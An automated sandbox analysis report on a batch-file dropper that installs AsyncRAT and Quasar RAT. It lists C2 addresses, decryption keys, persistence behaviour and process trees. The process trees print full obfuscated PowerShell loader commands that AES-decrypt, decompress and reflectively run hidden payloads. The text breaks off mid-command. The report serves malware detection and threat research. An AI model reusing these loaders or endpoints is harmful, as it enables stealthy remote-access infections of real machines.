asyncrat | 9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8

Analysis

max time kernel
352s
max time network
606s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
09-02-2023 14:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kk.bat
Size

182KB
MD5

df4da1ecd4c50871a1c4315f571e4402
SHA1

1dbbe9b3784cf5ecdd08b27132a7e31588954865
SHA256

9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8
SHA512

5f9e47f865c48cb1f2070d5d393a5d3494074bfe2347e07c988d06c8244dd420181c210a8ebdd54f768a64a5906d0c9e3be271d44f6e5bd32991bc2cacf85d3e
SSDEEP

3072:ur2RTVYk0bjRtZLlnm6Gdk8vZQfjO8KifQ6vfegRI8mlgJJ4u6A0FzfghYE:BRiltZITy8ufjLQsBUlgeMYE

Score

10^/10

asyncrat quasar default office04 rat spyware trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

207.244.236.205:6606

207.244.236.205:7707

207.244.236.205:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

quasharr.ddns.net:4782

quasharr21.ddns.net:4782

quasharr22.ddns.net:4782

quasharr33.ddns.net:4782

Mutex

1f1a8604-757c-4251-9294-1b6985c3c1c7

Attributes

encryption_key
2D1A3994D3C8E5C6071E7048589030F3E389DDC7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows
subdirectory
SubDir

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3748-1094-0x0000024629140000-0x00000246291C8000-memory.dmp	family_quasar

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1724-136-0x000001B6DF6B0000-0x000001B6DF6C2000-memory.dmp	asyncrat
behavioral1/memory/1724-224-0x000001B6E0290000-0x000001B6E02B2000-memory.dmp	asyncrat

Drops startup file 2 IoCs

Processes:

pluxxy.bat.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pluxxy.lnk	pluxxy.bat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pluxxy.lnk	pluxxy.bat.exe

Executes dropped EXE 3 IoCs

Processes:

kk.bat.exepluxxy.bat.exeprryry.bat.exe

pid process

1724 kk.bat.exe
4348 pluxxy.bat.exe
3748 prryry.bat.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 api.ipify.org
24 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
23	api.ipify.org
24	api.ipify.org

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3580 schtasks.exe

pid	process
3580	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

kk.bat.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings kk.bat.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	kk.bat.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

Processes:

kk.bat.exepowershell.exeAcroRd32.exepowershell.exepluxxy.bat.exeprryry.bat.exe

pid	process
1724	kk.bat.exe
1724	kk.bat.exe
1724	kk.bat.exe
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4128	powershell.exe
4128	powershell.exe
4128	powershell.exe
4348	pluxxy.bat.exe
4348	pluxxy.bat.exe
4348	pluxxy.bat.exe
3748	prryry.bat.exe
3748	prryry.bat.exe
3748	prryry.bat.exe
4348	pluxxy.bat.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

kk.bat.exepowershell.exepowershell.exepluxxy.bat.exeprryry.bat.exe

description	pid	process
Token: SeDebugPrivilege	1724	kk.bat.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	4348	pluxxy.bat.exe
Token: SeDebugPrivilege	3748	prryry.bat.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

AcroRd32.exeprryry.bat.exe

pid process

4232 AcroRd32.exe
3748 prryry.bat.exe
3748 prryry.bat.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

prryry.bat.exe

pid process

3748 prryry.bat.exe
3748 prryry.bat.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

AcroRd32.exepluxxy.bat.exeprryry.bat.exe

pid process

4232 AcroRd32.exe
4232 AcroRd32.exe
4232 AcroRd32.exe
4232 AcroRd32.exe
4232 AcroRd32.exe
4348 pluxxy.bat.exe
3748 prryry.bat.exe
4232 AcroRd32.exe

pid	process
4232	AcroRd32.exe
3748	prryry.bat.exe
3748	prryry.bat.exe

pid	process
3748	prryry.bat.exe
3748	prryry.bat.exe

pid	process
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4232	AcroRd32.exe
4348	pluxxy.bat.exe
3748	prryry.bat.exe
4232	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exekk.bat.exeAcroRd32.execmd.exepowershell.exeRdrCEF.exe

description	pid	process	target process
PID 4364 wrote to memory of 1724	4364	cmd.exe	kk.bat.exe
PID 4364 wrote to memory of 1724	4364	cmd.exe	kk.bat.exe
PID 1724 wrote to memory of 4232	1724	kk.bat.exe	AcroRd32.exe
PID 1724 wrote to memory of 4232	1724	kk.bat.exe	AcroRd32.exe
PID 1724 wrote to memory of 4232	1724	kk.bat.exe	AcroRd32.exe
PID 4232 wrote to memory of 2436	4232	AcroRd32.exe	RdrCEF.exe
PID 4232 wrote to memory of 2436	4232	AcroRd32.exe	RdrCEF.exe
PID 4232 wrote to memory of 2436	4232	AcroRd32.exe	RdrCEF.exe
PID 1724 wrote to memory of 444	1724	kk.bat.exe	cmd.exe
PID 1724 wrote to memory of 444	1724	kk.bat.exe	cmd.exe
PID 444 wrote to memory of 4936	444	cmd.exe	powershell.exe
PID 444 wrote to memory of 4936	444	cmd.exe	powershell.exe
PID 4232 wrote to memory of 2304	4232	AcroRd32.exe	RdrCEF.exe
PID 4232 wrote to memory of 2304	4232	AcroRd32.exe	RdrCEF.exe
PID 4232 wrote to memory of 2304	4232	AcroRd32.exe	RdrCEF.exe
PID 4936 wrote to memory of 4140	4936	powershell.exe	cmd.exe
PID 4936 wrote to memory of 4140	4936	powershell.exe	cmd.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4828	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4836	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4836	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4836	2436	RdrCEF.exe	RdrCEF.exe
PID 2436 wrote to memory of 4836	2436	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\kk.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4364

C:\Users\Admin\AppData\Local\Temp\kk.bat.exe
"kk.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $flLnL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\kk.bat').Split([Environment]::NewLine);foreach ($jhglm in $flLnL) { if ($jhglm.StartsWith(':: ')) { $uDeAm = $jhglm.Substring(3); break; }; };$dLIJD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uDeAm);$nJkwh = New-Object System.Security.Cryptography.AesManaged;$nJkwh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nJkwh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nJkwh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc=');$nJkwh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mehcJXqMnXZUmnmrBD1Eeg==');$bIbyd = $nJkwh.CreateDecryptor();$dLIJD = $bIbyd.TransformFinalBlock($dLIJD, 0, $dLIJD.Length);$bIbyd.Dispose();$nJkwh.Dispose();$gJfcg = New-Object System.IO.MemoryStream(, $dLIJD);$dkGYN = New-Object System.IO.MemoryStream;$yfRSU = New-Object System.IO.Compression.GZipStream($gJfcg, [IO.Compression.CompressionMode]::Decompress);$yfRSU.CopyTo($dkGYN);$yfRSU.Dispose();$gJfcg.Dispose();$dkGYN.Dispose();$dLIJD = $dkGYN.ToArray();$qMhaY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($dLIJD);$haTMg = $qMhaY.EntryPoint;$haTMg.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ticket_Reprint.pdf"
3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4232

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
- Suspicious use of WriteProcessMemory
PID:2436

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E848828DB0F4A19E6AF5E5843D728A21 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E848828DB0F4A19E6AF5E5843D728A21 --renderer-client-id=2 --mojo-platform-channel-handle=1608 --allow-no-sandbox-job /prefetch:1
5⤵
PID:4828

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BD75CDD8BB48A6241929C6D2400BA3BC --mojo-platform-channel-handle=1652 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4836

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=12BCC3695A17C57F8ED7244F7BA2037F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=12BCC3695A17C57F8ED7244F7BA2037F --renderer-client-id=4 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job /prefetch:1
5⤵
PID:4600

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=713D98C24BC0C33D927D6608AAB1E8C1 --mojo-platform-channel-handle=2784 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4160

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B3E70D28BC6BA4FFE9F20291A75C10DE --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4676

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DD9924A9357A666382A1703F180B42F2 --mojo-platform-channel-handle=1644 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:200

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:2304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pluxxy.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pluxxy.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pluxxy.bat" "
5⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\pluxxy.bat.exe
"pluxxy.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ZwKWw = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\pluxxy.bat').Split([Environment]::NewLine);foreach ($NQyqS in $ZwKWw) { if ($NQyqS.StartsWith(':: ')) { $VyMyb = $NQyqS.Substring(3); break; }; };$yaCoy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VyMyb);$GQISP = New-Object System.Security.Cryptography.AesManaged;$GQISP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GQISP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GQISP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WMFW5P0/CtF+7O+f4ksWFvupDWdQ51m1nRVHHgXRWDM=');$GQISP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0850FMCP44t3FWmESpntqg==');$kaVvZ = $GQISP.CreateDecryptor();$yaCoy = $kaVvZ.TransformFinalBlock($yaCoy, 0, $yaCoy.Length);$kaVvZ.Dispose();$GQISP.Dispose();$LRoLU = New-Object System.IO.MemoryStream(, $yaCoy);$jHPxc = New-Object System.IO.MemoryStream;$VbaME = New-Object System.IO.Compression.GZipStream($LRoLU, [IO.Compression.CompressionMode]::Decompress);$VbaME.CopyTo($jHPxc);$VbaME.Dispose();$LRoLU.Dispose();$jHPxc.Dispose();$yaCoy = $jHPxc.ToArray();$eGvgY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($yaCoy);$WseJJ = $eGvgY.EntryPoint;$WseJJ.Invoke($null, (, [string[]] ('')))
6⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\prryry.bat"' & exit
3⤵
PID:3464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\prryry.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\prryry.bat" "
5⤵
PID:2568

C:\Users\Admin\AppData\Local\Temp\prryry.bat.exe
"prryry.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $jwaHO = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\prryry.bat').Split([Environment]::NewLine);foreach ($eKGSM in $jwaHO) { if ($eKGSM.StartsWith(':: ')) { $qdqSr = $eKGSM.Substring(3); break; }; };$QQCgF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qdqSr);$AmjNH = New-Object System.Security.Cryptography.AesManaged;$AmjNH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AmjNH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AmjNH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h2/C7kSVdBKzfHpNijDOerbgICwzq39ikAsdwwbv4us=');$AmjNH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7g2z5diB2473fR8+2MRCTQ==');$wgvzs = $AmjNH.CreateDecryptor();$QQCgF = $wgvzs.TransformFinalBlock($QQCgF, 0, $QQCgF.Length);$wgvzs.Dispose();$AmjNH.Dispose();$tkbaD = New-Object System.IO.MemoryStream(, $QQCgF);$TZnYn = New-Object System.IO.MemoryStream;$FtxeR = New-Object System.IO.Compression.GZipStream($tkbaD, [IO.Compression.CompressionMode]::Decompress);$FtxeR.CopyTo($TZnYn);$FtxeR.Dispose();$tkbaD.Dispose();$TZnYn.Dispose();$QQCgF = 